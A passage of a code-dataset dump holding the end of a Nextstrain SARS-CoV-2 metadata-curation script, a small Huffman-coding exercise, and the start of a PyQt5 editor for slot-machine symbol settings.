header.index(\"division\")\n location_i = header.index(\"location\")\n strain_i = header.index(\"strain\")\n gisaid_epi_isl_i = header.index(\"gisaid_epi_isl\")\n genbank_accession_i = header.index(\"genbank_accession\")\n host_i = header.index(\"host\")\n\n line = f.readline()\n while line:\n l = line.split(\"\\t\")\n country = l[country_i]\n region = l[region_i]\n division = l[division_i]\n location = l[location_i]\n strain = l[strain_i]\n\n if gisaid:\n id = l[gisaid_epi_isl_i]\n else:\n id = l[genbank_accession_i]\n\n if (region, country, division, location) in applied_rules_geoLocation:\n geoLocationAnnotations[id] = (region, country, division, location), applied_rules_geoLocation[(region, country, division, location)], strain\n\n if (region, country, division, location) in applied_rules_manual:\n manualAnnotations[id] = (region, country, division, location), applied_rules_manual[(region, country, division, location)], strain\n\n line = f.readline()\n\n return geoLocationAnnotations, manualAnnotations\n\n# Compare old annotations with new alterations to the data and flag & adjust conflicts\n# (Since annotations overwrite geoLocationRules in the ncov-ingest pipeline, there is a need to find all annotations\n# that conflict with new rules and adjust the annotation accordingly)\n# For geoLocationRules, only test whether there are conflicting annotations that need adjustment.\n# For manualAnnotationRules, also produce new annotations.\ndef find_conflicting_annotations(annotations, geoLocationAnnotations, manualAnnotations, gisaid):\n for id in annotations[\"geography\"]:\n EPI_ISL = id.split(\"\\t\")[-1]\n for ruleSet in [geoLocationAnnotations, manualAnnotations]:\n if EPI_ISL in ruleSet:\n (region2, country2, division2, location2) = ruleSet[EPI_ISL][1]\n annotations_correct = {\"region\": region2, \"country\": country2, \"division\": division2, \"location\": location2}\n for type in annotations_correct:\n if type in annotations[\"geography\"][id]:\n name0 = annotations[\"geography\"][id][type]\n comment = \"\"\n if \"#\" in name0:\n (name0, comment) = name0.split(\" #\")\n if name0 != annotations_correct[type]:\n print(f\"Conflicting annotation: {id}\\t{bold(type + ' ' + name0)} will be replaced with {bold(annotations_correct[type])}\")\n annotations[\"geography\"][id][type] = annotations_correct[type]\n if comment != \"\":\n annotations[\"geography\"][id][type] += \" #\" + comment\n\n for EPI_ISL in manualAnnotations:\n (region, country, division, location) = manualAnnotations[EPI_ISL][0]\n (region2, country2, division2, location2) = manualAnnotations[EPI_ISL][1]\n strain = manualAnnotations[EPI_ISL][2]\n if gisaid:\n id = strain + \"\\t\" + EPI_ISL\n else:\n id = EPI_ISL\n annotations_correct = {\"region\": (region, region2), \"country\": (country, country2), \"division\": (division, division2), \"location\": (location, location2)}\n for type in annotations_correct:\n if annotations_correct[type][0] != annotations_correct[type][1]:\n if id not in annotations[\"geography\"]:\n annotations[\"geography\"][id] = {}\n if type not in annotations[\"geography\"][id]:\n annotations[\"geography\"][id][type] = annotations_correct[type][1] + \" # previously \" + annotations_correct[type][0]\n\n return annotations\n\nclade_dates = {\n \"19A\": \"2019-12-01\",\n \"19B\": \"2019-12-01\",\n \"20A\": \"2020-01-20\",\n \"20A.EU2\": \"2020-02-15\",\n \"20B\": \"2020-02-14\",\n \"20C\": \"2020-02-25\",\n \"20D\": \"2020-03-12\",\n \"20E (EU1)\": \"2020-05-27\",\n \"20F\": \"2020-05-24\",\n \"20G\": \"2020-06-11\",\n \"20H (Beta, V2)\": \"2020-08-10\",\n \"20I (Alpha, V1)\": \"2020-09-20\",\n \"20J (Gamma, V3)\": \"2020-10-29\",\n \"21A (Delta)\": \"2020-10-30\",\n \"21B (Kappa)\": \"2020-10-30\",\n \"21C (Epsilon)\": \"2020-08-03\",\n \"21D (Eta)\": \"2020-11-21\",\n \"21E (Theta)\": \"2021-01-10\",\n \"21F (Iota)\": \"2020-11-20\",\n \"21G (Lambda)\": \"2021-01-05\",\n \"21H\": \"2021-01-05\",\n}\n# Check for special cases where annotations need to be introduced, e.g. special characters in strain names, or adjustment to \"Mink\"\n# Also check for sampling dates that are too early for the assigned clade and auto-add to exclude\ndef special_metadata_checks(metadata_filename, annotations, gisaid):\n special_annotations = {}\n\n unknown_clades = []\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().strip().split(\"\\t\")\n strain_i = header.index(\"strain\")\n gisaid_epi_isl_i = header.index(\"gisaid_epi_isl\")\n genbank_accession_i = header.index(\"genbank_accession\")\n host_i = header.index(\"host\")\n clade_i = header.index(\"Nextstrain_clade\")\n date_i = header.index(\"date\")\n clock_deviation_i = header.index(\"clock_deviation\")\n\n line = f.readline()\n while line:\n l = line.strip().split(\"\\t\")\n host = l[host_i]\n strain = l[strain_i]\n\n if gisaid:\n id = strain + \"\\t\" + l[gisaid_epi_isl_i]\n else:\n id = l[genbank_accession_i]\n\n # Check for special cases where annotations need to be introduced, e.g. special characters in strain names, or adjustment to \"Mink\"\n if host == \"Neovison vison\" or host == \"Mustela lutreola\":\n print(\"Adjust host \" + host + \" to Mink\")\n if id not in special_annotations:\n special_annotations[id] = {}\n special_annotations[id][\"host\"] = \"Mink # previously \" + host\n\n problematic_char = [\"'\", \"`\"]\n for c in problematic_char:\n if c in strain:\n strain2 = strain.replace(c, \"-\")\n print(\"Adjust strain \" + strain + \" to \" + strain2)\n if id not in special_annotations:\n special_annotations[id] = {}\n special_annotations[id][\"strain\"] = strain2 + \" # previously \" + strain\n\n line = f.readline()\n\n for id in special_annotations:\n if id not in annotations[\"special\"]:\n annotations[\"special\"][id] = {}\n for type in special_annotations[id]:\n if type in annotations[\"special\"][id]:\n if annotations[\"special\"][id][type] != special_annotations[id][type]:\n print(\"Conflicting annotation: \" + id + \"\\t\" + bold(type + \" \" + annotations[\"special\"][id][type]) + \" will be replaced with \" + bold(special_annotations[id][type]))\n annotations[\"special\"][id][type] = special_annotations[id][type]\n\n return annotations\n\n# Write the adjusted annotation set to the output folder in a sorted manner\ndef write_annotations(annotations, annotationsFile):\n with open(path_to_output_files + annotationsFile, \"w\") as out:\n for section in annotations:\n if section == \"comments\":\n for line in sorted(annotations[section]):\n out.write(line + \"\\n\")\n else:\n for id in sorted(annotations[section]):\n for type in sorted(annotations[section][id]):\n out.write(id + \"\\t\" + type + \"\\t\" + annotations[section][id][type] + \"\\n\")\n\n\npath_to_metadata = \"data/\"\npath_to_default_files = \"defaults/\" # Contains color_ordering.tsv and lat_longs.tsv\npath_to_config_files = \"scripts/curate_metadata/config_curate_metadata/\"\npath_to_output_files = \"scripts/curate_metadata/output_curate_metadata/\"\npath_to_annotations = \"../ncov-ingest/source-data/\" # Contains gisaid and genbank annotation files\nPath(path_to_output_files).mkdir(parents=True, exist_ok=True)\nPath(path_to_config_files).mkdir(parents=True, exist_ok=True)\n\ngisaid_metadata_file = \"downloaded_gisaid.tsv\"\ngenbank_metadata_file = \"metadata_genbank.tsv\"\nabbreviations_file = \"abbreviations.txt\"\naccepted_additions_file = \"acceptedExposureAdditions.txt\"\ngeoLocationRules_file = \"geoLocationRules.txt\"\nmanualAnnotationRules_file = \"manualAnnotationRules.txt\"\ninternationalExceptions_file = \"internationalExceptions.txt\"\ngisaidAnnotationsFile = \"gisaid_annotations.tsv\"\ngenbankAnnotationsFile = \"genbank_annotations.tsv\"\nordering_file = \"color_ordering.tsv\"\nlatlongs_file = \"lat_longs.tsv\"\nexclude_file = \"exclude.txt\"\n\nif not os.path.exists(path_to_config_files + geoLocationRules_file):\n with open(path_to_config_files + geoLocationRules_file, 'w'): pass\n\nif not os.path.exists(path_to_config_files + manualAnnotationRules_file):\n with open(path_to_config_files + manualAnnotationRules_file, 'w'): pass\n\nmanualAnnotationsDelimiter = [\"/\", \",\"]\nregion_order = [\"Asia\", \"Oceania\", \"Africa\", \"Europe\", \"South America\", \"North America\"]\n\nif __name__ == '__main__':\n\n print(\"\\n===============================================\\n\")\n # Collect metadata from gisaid and genbank in a joint, multi-level dictionary accessible via data[region][country][division] = list_of_locations\n data = {}\n # count occurences\n geo_location_occurences = {\"region\": Counter(), \"country\": Counter(), \"division\": Counter(), \"location\": Counter()}\n print(\"Reading GISAID metadata...\")\n data, geo_location_occurences = read_metadata(gisaid_metadata_file, data, geo_location_occurences)\n\n print(\"Reading GenBank metadata...\")\n data, geo_location_occurences = read_metadata(genbank_metadata_file, data, geo_location_occurences, genbank=True)\n\n print(\"\\n===============================================\\n\")\n # Add countries, regions and divisions that only appear in the exposure info from gisaid metadata\n # (We don't have any exposure info for genbank)\n print(\"Checking exposure consistency...\")\n data = read_exposure(data, gisaid_metadata_file, accepted_additions_file)\n\n print(\"\\n===============================================\\n\")\n print(\"Applying new geoLocationRules...\")\n # Apply new general rules that will be copied over into ncov-ingest/source-data/gisaid_geoLocationRules.tsv\n data, applied_rules_geoLocation = apply_rules(data, geoLocationRules_file)\n\n print(\"\\nApplying manualAnnotationRules...\")\n # Apply new specific rules that will be translated into annotations\n # (needed for cases where geoLocationRules won't work, e.g. for locations containing the delimiter char '/')\n data, applied_rules_manual = apply_rules(data, manualAnnotationRules_file, delimiter = manualAnnotationsDelimiter)\n\n print(\"\\n(Applying adjustments to international cruiseships...)\")\n # Some cruiseships need adjustment to one country only so they don't appear multiple times in color_ordering.tsv\n data, applied_rules_exceptions = apply_rules(data, internationalExceptions_file, print_rules = False)\n\n print(\"\\n===============================================\\n\")\n # Check for names that appear as division and location\n print(\"Checking for division inconsistencies...\")\n check_division_inconsistency(data)\n\n print(\"\\n===============================================\\n\")\n # Check for locations and divisions that appear multiple times\n print(\"Checking for location duplicates...\")\n locations_duplicates = check_duplicates(data, abbreviations_file)\n\n print(\"\\n===============================================\\n\")\n # List all locations, divisions, coutnries and regions that have no lat_longs in defaults/lat_longs.tsv\n print(\"Checking for missing lat_longs...\")\n missing_latlongs = missing_coordinates(data, path_to_default_files, geo_location_occurences)\n print_missing_places(missing_latlongs)\n\n print(\"\\n===============================================\\n\")\n # For all missing places, search for names that are similar or identical (when not considering special characters)\n # For locations, also consider special cases for USA counties\n print(\"Checking for similar names...\")\n search_similar_names(data, missing_latlongs, locations_duplicates)\n\n print(\"\\n===============================================\\n\")\n # Using geopy, search coordinates for all missing places and auto-sort them into lat_longs.tsv\n answer = input(\"Would you like to search for missing lat_longs [y/n]? \")\n if answer == \"y\":\n print(\"\\nSearching for lat_longs...\")\n search_missing_latlongs(missing_latlongs)\n else:\n print(\"\\nAuto-sorting \" + latlongs_file + \"...\")\n auto_add_lat_longs([])\n\n print(\"\\n===============================================\\n\")\n # Reconstruct the color_ordering.tsv file based on the data dictionary and old and new lat_longs\n print(\"Constructing new color_ordering file...\")\n build_ordering(data, answer == \"y\")\n\n\n print(\"\\n===============================================\\n\")\n # Collect all known annotations and sort by type & strain\n print(\"\\nReading annotations...\")\n annotations_gisaid = read_annotations(gisaidAnnotationsFile, gisaid=True)\n annotations_open = read_annotations(genbankAnnotationsFile, gisaid=False)\n\n answer2 = input(\"Would you like to check annotations for conflicts with geoLocationRules and produce manualAnnotations [y/n]? \")\n if answer2 == \"y\":\n\n # Collect all strains for which new rules apply\n print(\"\\n----------\\n\")\n print(\"Applying new geoLocationRules and manualAnnotationRules to the metadata...\")\n geoLocationAnnotations_gisaid, manualAnnotations_gisaid = create_annotations(gisaid_metadata_file, applied_rules_geoLocation, applied_rules_manual, gisaid = True)\n geoLocationAnnotations_open, manualAnnotations_open = create_annotations(genbank_metadata_file, applied_rules_geoLocation, applied_rules_manual, gisaid=False)\n\n # Compare affected strains with annotations and search for conflicts (-> update annotations to fit new rules)\n # Also insert new annotations created by manualAnnotationRules\n print(\"\\n----------\\n\")\n print(\"Searching for conflicting annotations and adding manualAnnotationRules...\")\n annotations_gisaid = find_conflicting_annotations(annotations_gisaid, geoLocationAnnotations_gisaid, manualAnnotations_gisaid, gisaid = True)\n annotations_open = find_conflicting_annotations(annotations_open, geoLocationAnnotations_open, manualAnnotations_open, gisaid = False)\n\n print(\"\\n----------\\n\")\n # Perform special checks on the metadata, e.g. check for Mink host consistency, check if date is consistent with clade...\n answer3 = input(\"Would you like to perform additional metadata checks (e.g. date, host, strain name) [y/n]? \")\n if answer3 == \"y\":\n print(\"Traversing metadata...\")\n annotations_gisaid = special_metadata_checks(gisaid_metadata_file, annotations_gisaid, gisaid = True)\n annotations_open = special_metadata_checks(genbank_metadata_file, annotations_open, gisaid = False)\n\n\n # Sort and write updated annotation files to output folder\n print(\"\\n----------\\n\")\n print(\"Writing updated annotation files to \" + path_to_output_files + \"...\")\n write_annotations(annotations_gisaid, gisaidAnnotationsFile)\n write_annotations(annotations_open, genbankAnnotationsFile)\n\n with open(path_to_annotations + gisaidAnnotationsFile, \"r\") as f:\n annot_gisaid_old = f.read()\n with open(path_to_output_files + gisaidAnnotationsFile, \"r\") as f:\n annot_gisaid_new = f.read()\n if annot_gisaid_old != annot_gisaid_new:\n print(bold(\"Attention: \" + gisaidAnnotationsFile + \" was altered! Remember to replace the old file in \" + path_to_annotations + \".\"))\n else:\n print(\"No changes to \" + gisaidAnnotationsFile + \".\")\n\n with open(path_to_annotations + genbankAnnotationsFile, \"r\") as f:\n annot_open_old = f.read()\n with open(path_to_output_files + genbankAnnotationsFile, \"r\") as f:\n annot_open_new = f.read()\n if annot_open_old != annot_open_new:\n print(bold(\"Attention: \" + genbankAnnotationsFile + \" was altered! Remember to replace the old file in \" + path_to_annotations + \".\"))\n else:\n print(\"No changes to \" + genbankAnnotationsFile + \".\")\n\n","repo_name":"nextstrain/ncov","sub_path":"scripts/curate_metadata/curate_metadata.py","file_name":"curate_metadata.py","file_ext":"py","file_size_in_byte":63882,"program_lang":"python","lang":"en","doc_type":"code","stars":1348,"dataset":"github-code","pt":"3"} +{"seq_id":"33789096115","text":"import sys\ndata = sys.stdin.read()\n\nclass Tree():\n def __init__(self, left, right):\n self.left = left\n self.right = right\n\ndef huffman(node, code = ''):\n if type(node) is int: return {node: code}\n dict = {}\n dict.update(huffman(node.left, code + '0'))\n dict.update(huffman(node.right, code + '1'))\n return dict\n\nfor line in data.splitlines()[1:]:\n nums = [(int(nums), int(nums)) for nums in line.split(',')]\n nums_sort = sorted(nums, reverse = True)\n while len(nums_sort) > 1:\n node_a, value_a = nums_sort[-1]\n node_b, value_b = nums_sort[-2]\n nums_sort = nums_sort[:-2]\n node = Tree(node_a, node_b)\n nums_sort.append((node, value_a + value_b))\n nums_sort = sorted(nums_sort, key = lambda node: node[1], reverse = True)\n \n ans = ''\n for node, value in nums:\n ans += f'{len(huffman(nums_sort[0][0])[node])},'\n print(ans[:-1])","repo_name":"rtashklzx47277/Python_practice","sub_path":"NTUB/10542.py","file_name":"10542.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4724915796","text":"# -*- coding: utf-8 -*-\nimport sys\nimport json\nimport ntpath\nfrom PyQt5 import QtWidgets, QtGui, QtCore, sip\n\n# counts\ncount = 0\ncount_lines = 0\ncount_tabs = 1\n\n# colors\ndefault_color = QtGui.QColor(220, 220, 220)\nwild_color = QtGui.QColor(255, 229, 100)\nscatter_color = QtGui.QColor(120, 237, 255)\nwildnscatter_color = QtGui.QColor(221, 172, 225)\n\n\ndef path_leaf(path):\n head, tail = ntpath.split(path)\n return tail or ntpath.basename(head)\n\n\ndef isint(value):\n try:\n int(value)\n return int(value)\n except ValueError:\n return -1\n\n\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef float_validate(self, bot, top):\n sender = self.sender()\n if str(sender.text()) != '':\n try:\n if not bot <= float(sender.text()) <= top:\n raise ValueError\n sender.setStyleSheet('')\n except ValueError:\n sender.setStyleSheet('QLineEdit {background-color: #f6989d;}')\n else:\n sender.setStyleSheet('')\n\n\ndef int_validate(self, bot, top):\n sender = self.sender()\n if str(sender.text()) != '':\n try:\n if not bot <= int(sender.text()) <= top:\n raise ValueError\n sender.setStyleSheet('')\n except ValueError:\n sender.setStyleSheet('QLineEdit {background-color: #f6989d;}')\n else:\n sender.setStyleSheet('')\n\n\ndef string_validate(self):\n sender = self.sender()\n if str(sender.text()) == '':\n sender.setStyleSheet('QLineEdit {background-color: #f6989d;}')\n else:\n sender.setStyleSheet('')\n\n\nclass Aesthetic(QtWidgets.QWidget):\n def __init__(self, obj):\n super(Aesthetic, self).__init__()\n\n fon = QtWidgets.QHBoxLayout()\n fon.addWidget(obj)\n fon.addStretch(40)\n self.setLayout(fon)\n\n\nclass LabeledLine(QtWidgets.QWidget):\n def __init__(self, name, color):\n super(LabeledLine, self).__init__()\n\n self.fon = QtWidgets.QHBoxLayout()\n self.label = QtWidgets.QLabel(str(name))\n self.line = QtWidgets.QLineEdit()\n\n self.init_ui(color)\n\n def init_ui(self, color):\n self.fon.setSpacing(0)\n self.fon.addWidget(self.label)\n self.fon.addWidget(self.line)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n\n self.label.setStyleSheet('QLabel {border-left: 1px solid black; border-top: 1px solid black; border-right: none; border-bottom: 1px solid black}')\n self.label.setAutoFillBackground(True)\n p = self.label.palette()\n p.setColor(self.label.backgroundRole(), color)\n self.label.setPalette(p)\n\n self.setLayout(self.fon)\n\n\nclass LineEdits(QtWidgets.QWidget):\n def __init__(self, length, width, bot, top, height=None, space=None, double=None):\n super(LineEdits, self).__init__()\n\n self.fon = QtWidgets.QHBoxLayout()\n self.lines = []\n\n self.init_ui(length, width, bot, top, height, space, double)\n\n def init_ui(self, length, width, bot, top, height, space, double):\n for i in range(length):\n line = QtWidgets.QLineEdit()\n if double is None:\n line.textChanged.connect(lambda: self.int_validate(bot, top))\n else:\n line.textChanged.connect(lambda: self.float_validate(bot, top))\n self.lines.append(line)\n self.lines[i].setFixedWidth(width)\n if height is not None:\n self.lines[i].setFixedHeight(height)\n self.fon.addWidget(self.lines[i])\n if space is not None:\n self.fon.setSpacing(space)\n self.fon.addStretch(40)\n\n self.setLayout(self.fon)\n\n int_validate = int_validate\n float_validate = float_validate\n\n def collect_info(self):\n info = []\n for i in range(len(self.lines)):\n if isint(str(self.lines[i].text())) > 0:\n info.append([i + 1, int(str(self.lines[i].text()))])\n return info\n\n def arrange_info(self):\n info = []\n for i in range(len(self.lines)):\n if isint(str(self.lines[i].text())) > 0:\n info.append(int(str(self.lines[i].text())))\n else:\n return None\n return info\n\n def set_info(self, interim_info):\n for obj in interim_info:\n self.lines[obj[0] - 1].setText(str(obj[1]))\n\n def fill_info(self, interim_info):\n for i in range(len(interim_info)):\n self.lines[i].setText(str(interim_info[i]))\n\n\nclass SwitchButtons(QtWidgets.QWidget):\n def __init__(self, width, size):\n super(SwitchButtons, self).__init__()\n\n self.fon = QtWidgets.QHBoxLayout()\n self.buttons = []\n\n self.init_ui(width, size)\n\n def init_ui(self, width, size):\n for i in range(width):\n button = QtWidgets.QPushButton()\n button.setCheckable(True)\n\n button.setStyleSheet(\"QPushButton {background-color: #4CCD59; border: none;}\"\n \"QPushButton:pressed { background-color: #00A505 }\"\n \"QPushButton:focus { background-color: #4CCD59 }\"\n \"QPushButton:focus:pressed { background-color: #00A505 }\"\n \"QPushButton:hover { background-color: #27E83A }\")\n button.setIcon(QtGui.QIcon('icons/allowed.png'))\n button.clicked[bool].connect(self.toggle)\n self.buttons.append(button)\n self.buttons[i].setFixedWidth(size)\n self.buttons[i].setFixedHeight(24)\n self.fon.addWidget(self.buttons[i])\n self.fon.addStretch(40)\n\n self.setLayout(self.fon)\n\n def toggle(self, pressed):\n sender = self.sender()\n if pressed:\n sender.setStyleSheet(\"QPushButton {background-color: #EB6C6C; border: none;}\"\n \"QPushButton:pressed { background-color: #EB4848 }\"\n \"QPushButton:focus { background-color: #EB6C6C }\"\n \"QPushButton:focus:pressed { background-color: #EB4848 }\"\n \"QPushButton:hover { background-color: #F97373 }\")\n sender.setIcon(QtGui.QIcon('icons/prohibited.png'))\n else:\n sender.setAutoFillBackground(True)\n sender.setStyleSheet(\"QPushButton {background-color: #4CCD59; border: none;}\"\n \"QPushButton:pressed { background-color: #00A505 }\"\n \"QPushButton:focus { background-color: #4CCD59 }\"\n \"QPushButton:focus:pressed { background-color: #00A505 }\"\n \"QPushButton:hover { background-color: #27E83A }\")\n sender.setIcon(QtGui.QIcon('icons/allowed.png'))\n\n def collect_info(self):\n info = []\n for i in range(len(self.buttons)):\n if not self.buttons[i].isChecked():\n info.append(i + 1)\n return info\n\n def set_info(self, interim_symbol_type):\n for i in range(len(self.buttons)):\n if i + 1 not in interim_symbol_type['position']:\n self.buttons[i].click()\n\n\nclass Wild(QtWidgets.QWidget):\n def __init__(self):\n super(Wild, self).__init__()\n\n self.fon = QtWidgets.QGridLayout()\n\n self.label_multiplier = QtWidgets.QLabel('multiplier')\n self.line_multiplier = QtWidgets.QLineEdit()\n\n self.label_substitute = QtWidgets.QLabel('substitute')\n self.line_substitute = QtWidgets.QLineEdit()\n\n self.label_expand = QtWidgets.QLabel('expand')\n self.checkbox_expand = QtWidgets.QCheckBox()\n\n self.init_ui()\n\n def init_ui(self):\n self.fon.setColumnStretch(2, 40)\n\n self.fon.addWidget(self.label_multiplier, 0, 0)\n self.fon.addWidget(self.line_multiplier, 0, 1)\n self.line_multiplier.setFixedWidth(40)\n self.line_multiplier.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon.addWidget(self.label_substitute, 1, 0)\n self.fon.addWidget(self.line_substitute, 1, 1)\n self.line_substitute.setFixedWidth(40)\n self.line_substitute.textChanged.connect(self.adjust)\n\n self.fon.addWidget(self.label_expand, 2, 0)\n self.fon.addWidget(self.checkbox_expand, 2, 1)\n self.setLayout(self.fon)\n\n def adjust(self):\n text = self.line_substitute.text()\n fm = self.line_substitute.fontMetrics()\n w = fm.boundingRect(text).width()\n self.line_substitute.setFixedWidth(max(w + 12, 40))\n\n float_validate = float_validate\n\n def collect_info(self):\n d = {}\n if isint(str(self.line_multiplier.text())) >= 0:\n d.update({'multiplier': int(str(self.line_multiplier.text()))})\n if self.checkbox_expand.checkState() == QtCore.Qt.Checked:\n d.update({'expand': True})\n words = str(self.line_substitute.text()).split('; ')\n if words is not None and words != ['']:\n d.update({'substitute': words})\n return d\n\n def set_info(self, interim_symbol_type):\n if 'multiplier' in interim_symbol_type['wild']:\n self.line_multiplier.setText(str(interim_symbol_type['wild']['multiplier']))\n\n if 'expand' in interim_symbol_type['wild'] and interim_symbol_type['wild']['expand'] is True:\n self.checkbox_expand.setChecked(True)\n\n if 'substitute' in interim_symbol_type['wild']:\n self.line_substitute.setText('; '.join(interim_symbol_type['wild']['substitute']))\n\n\nclass Gametype(QtWidgets.QWidget):\n def __init__(self, type, width):\n super(Gametype, self).__init__()\n\n self.width = width\n\n self.fon_back = QtWidgets.QGridLayout()\n self.fon = QtWidgets.QGridLayout()\n\n for i in range(7):\n self.fon.setRowStretch(i, 1)\n\n self.fon.setRowStretch(7, 400)\n\n self.fon_cancel = QtWidgets.QHBoxLayout()\n\n self.label = QtWidgets.QLabel(type)\n self.label_direction = QtWidgets.QLabel('direction')\n self.line_direction = QtWidgets.QComboBox()\n self.line_direction.setFixedWidth(100)\n self.line_direction.addItems(['left', 'right', 'both', 'any'])\n\n self.label_position = QtWidgets.QLabel('position')\n self.buttons_position = SwitchButtons(self.width, 40)\n\n self.label_scatter = QtWidgets.QLabel('scatter')\n self.checkbox_scatter = QtWidgets.QCheckBox()\n\n self.label_freespins = QtWidgets.QLabel('freespins')\n self.line_freespins = None\n\n self.label_wild = QtWidgets.QLabel('wild')\n self.checkbox_wild = QtWidgets.QCheckBox()\n\n self.wild = None\n\n self.frame = QtWidgets.QFrame()\n\n self.init_ui()\n\n def init_ui(self):\n self.fon.addWidget(self.label_direction, 1, 0)\n self.fon.addWidget(Aesthetic(self.line_direction), 1, 1)\n\n self.fon.addWidget(self.label_position, 2, 0)\n self.fon.addWidget(self.buttons_position, 2, 1)\n\n self.fon.addWidget(self.label_scatter, 3, 0)\n self.fon.addWidget(Aesthetic(self.checkbox_scatter), 3, 1)\n self.checkbox_scatter.stateChanged.connect(self.scatter_check)\n\n self.fon.addWidget(self.label_wild, 5, 0)\n self.fon.addWidget(Aesthetic(self.checkbox_wild), 5, 1)\n self.checkbox_wild.stateChanged.connect(self.wild_check)\n\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.frame.setLayout(self.fon)\n\n self.fon_back.addWidget(self.frame)\n\n self.fon_cancel.addStretch(400)\n self.fon.addLayout(self.fon_cancel, 8, 1)\n\n self.checkbox_wild.stateChanged.connect(self.change_colour)\n self.checkbox_scatter.stateChanged.connect(self.change_colour)\n\n self.setLayout(self.fon_back)\n\n def scatter_check(self, state):\n if state == QtCore.Qt.Checked:\n self.fon.addWidget(self.label_freespins, 4, 0)\n self.line_freespins = LineEdits(self.width, 40, 0, sys.maxsize, None, None, True)\n self.fon.addWidget(self.line_freespins, 4, 1)\n else:\n self.fon.removeWidget(self.label_freespins)\n sip.delete(self.label_freespins)\n self.label_freespins = QtWidgets.QLabel('freespins')\n\n self.fon.removeWidget(self.line_freespins)\n sip.delete(self.line_freespins)\n self.line_freespins = None\n\n def wild_check(self, state):\n if state == QtCore.Qt.Checked:\n self.wild = Wild()\n self.fon.addWidget(self.wild, 6, 0, 1, 2)\n else:\n self.fon.removeWidget(self.wild)\n sip.delete(self.wild)\n self.wild = None\n\n def change_colour(self):\n global default_color, wild_color, scatter_color, wildnscatter_color\n self.frame.setAutoFillBackground(True)\n p = self.frame.palette()\n if self.checkbox_wild.checkState() == QtCore.Qt.Checked and self.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n p.setColor(self.frame.backgroundRole(), wildnscatter_color)\n self.frame.setPalette(p)\n\n elif self.checkbox_wild.checkState() == QtCore.Qt.Checked:\n p.setColor(self.frame.backgroundRole(), wild_color)\n self.frame.setPalette(p)\n\n elif self.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n p.setColor(self.frame.backgroundRole(), scatter_color)\n self.frame.setPalette(p)\n\n else:\n p.setColor(self.frame.backgroundRole(), default_color)\n self.frame.setPalette(p)\n\n def collect_info(self):\n d = {}\n d.update({'direction': str(self.line_direction.currentText())})\n d.update({'position': self.buttons_position.collect_info()})\n if self.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n d.update({'scatter': self.line_freespins.collect_info()})\n if self.checkbox_wild.checkState() == QtCore.Qt.Checked:\n d.update({'wild': self.wild.collect_info()})\n return d\n\n def set_info(self, interim_symbol_type):\n if 'direction' in interim_symbol_type:\n index = self.line_direction.findText(interim_symbol_type['direction'], QtCore.Qt.MatchFixedString)\n if index >= 0:\n self.line_direction.setCurrentIndex(index)\n\n if 'position' in interim_symbol_type:\n self.buttons_position.set_info(interim_symbol_type)\n\n if 'scatter' in interim_symbol_type:\n self.checkbox_scatter.setCheckState(QtCore.Qt.Checked)\n self.line_freespins.set_info(interim_symbol_type['scatter'])\n\n if 'wild' in interim_symbol_type:\n self.checkbox_wild.setCheckState(QtCore.Qt.Checked)\n self.wild.set_info(interim_symbol_type)\n\n\nclass Symbol(QtWidgets.QWidget):\n def __init__(self, count, width):\n super(Symbol, self).__init__()\n\n self.frame_symbol = QtWidgets.QFrame()\n self.fon_back = QtWidgets.QVBoxLayout()\n self.fon_symbol = QtWidgets.QVBoxLayout()\n self.fon_type = QtWidgets.QGridLayout()\n self.border = QtWidgets.QLabel(' ')\n self.label_base = QtWidgets.QLabel('base game')\n self.label_free = QtWidgets.QLabel('free game')\n\n self.fon_name = QtWidgets.QHBoxLayout()\n self.label_name = QtWidgets.QLabel('name ')\n self.line_name = QtWidgets.QLineEdit('symbol_' + str(count + 1))\n\n self.fon_payment = QtWidgets.QHBoxLayout()\n self.label_payment = QtWidgets.QLabel('payment')\n self.line_payment = None\n\n self.width = width\n self.base = Gametype('base game', self.width)\n self.free = None\n\n self.fon_button = QtWidgets.QVBoxLayout()\n self.frame_button = QtWidgets.QFrame()\n self.button_free = QtWidgets.QPushButton()\n self.button_free.setIcon(QtGui.QIcon('icons/edit.png'))\n self.button_state = True\n\n self.init_ui()\n\n def init_ui(self):\n self.fon_name.addWidget(self.label_name)\n self.line_name.setFixedWidth(225)\n self.fon_name.addWidget(Aesthetic(self.line_name))\n self.line_name.textChanged.connect(self.string_validate)\n\n self.fon_payment.addWidget(self.label_payment)\n self.line_payment = LineEdits(self.width, 40, 0, sys.maxsize, None, None, True)\n self.fon_payment.addWidget(self.line_payment)\n\n self.fon_symbol.addLayout(self.fon_name)\n self.fon_symbol.addLayout(self.fon_payment)\n self.fon_symbol.addLayout(self.fon_type)\n\n self.fon_type.addWidget(self.base, 0, 0, 1, 1)\n\n self.fon_type.addWidget(self.frame_button, 0, 2)\n self.frame_button.setLayout(self.fon_button)\n self.frame_button.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.frame_button.setContentsMargins(0, 0, 0, 0)\n self.fon_button.addWidget(self.button_free)\n self.button_free.clicked.connect(self.button_free_clicked)\n self.button_free.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n self.button_free.setToolTip('Edit free game properties')\n\n self.fon_type.setColumnStretch(0, 40)\n\n self.fon_type.setHorizontalSpacing(0)\n\n self.fon_symbol.addWidget(self.border)\n\n #self.frame_symbol.setLineWidth(2)\n self.frame_symbol.setFrameShape(QtWidgets.QFrame.WinPanel)\n self.frame_symbol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_symbol.setAutoFillBackground(True)\n p = self.frame_symbol.palette()\n p.setColor(self.frame_symbol.backgroundRole(), QtGui.QColor(220, 220, 220))\n self.frame_symbol.setPalette(p)\n\n self.frame_symbol.setLayout(self.fon_symbol)\n self.fon_back.addWidget(self.frame_symbol)\n self.setLayout(self.fon_back)\n\n def button_free_clicked(self):\n if self.button_state:\n self.fon_type.setColumnStretch(1, 40)\n self.free = Gametype('free game', self.width)\n self.base.fon.addWidget(self.base.label, 0, 0, 1, 